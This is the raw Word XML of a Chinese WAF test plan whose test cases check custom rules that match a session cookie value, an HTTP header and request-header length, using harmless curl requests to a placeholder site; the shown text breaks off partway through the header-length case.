      <w:bookmarkStart w:id="167" w:name="_Toc1491492652"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
      <w:bookmarkEnd w:id="167"/>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4EB5AE7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C2DF2B4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="39C4D1E9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Session匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="67AA0AE9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2AF3B8E5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6308E79B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Session规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="448BF10A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0171722D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7835E08A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F4172E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402A071E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览站点的Session字段中完全匹配fs</w:t>
            </w:r>
            <w:r>
              <w:t>2tk6i6m4sre1gopbh1qasnl5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275FE7B6">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「防护站点管理」中选择防护站点，并且在「用户识别」中添加用户识别位置，从Cookie字段的PHPSESSION变量中提取用户的ID；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2548F47B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -vv http://www.site.com/dvwa/css.main.css  -H “Cookie: PHPSESSID= fs2tk6i6m4sre1gopbh1qasnl5”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD7D178">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43FD07C8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="47AADDA1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="010550E5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39A72447">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5D204C09">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B11EC68">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F147E5F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5C27911B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74F6A66D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="355B99D6">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16297259">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6040EBA2">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359C9FFC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc21077829"/>
      <w:bookmarkStart w:id="169" w:name="_Toc81916133"/>
      <w:bookmarkStart w:id="170" w:name="_Toc2087874380"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Header匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>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3E5C0973">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="54B2633B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5A95C2B9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Header匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2ABFD32E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BE35D3D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0C7CCC8C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Header规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="15560564">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C1547A8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="776AB77E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="540E5735">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45345E73">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点</w:t>
            </w:r>
            <w:r>
              <w:t>HTTP header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中包含</w:t>
            </w:r>
            <w:r>
              <w:t>Upgrade-Insecure-Requests:1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05184596">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/apache2/session.html -H “Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F323CE0">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2117F0D6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="201980A8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0D6970C5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18C6F5E8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2E7F0F38">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B77AA23">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2A45F751">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23D47C0E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29A7F676">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BA6CA63">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38AEF050">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="592DB87D">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0B79FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc81916134"/>
      <w:bookmarkStart w:id="172" w:name="_Toc21077830"/>
      <w:bookmarkStart w:id="173" w:name="_Toc1021912680"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求头长度匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>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722DA051">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3553ABF0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="65F7E589">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义请求头长度匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DBF2DA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5B6C44AD">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6393876C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配请求头长度规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22301DAC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A46227A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
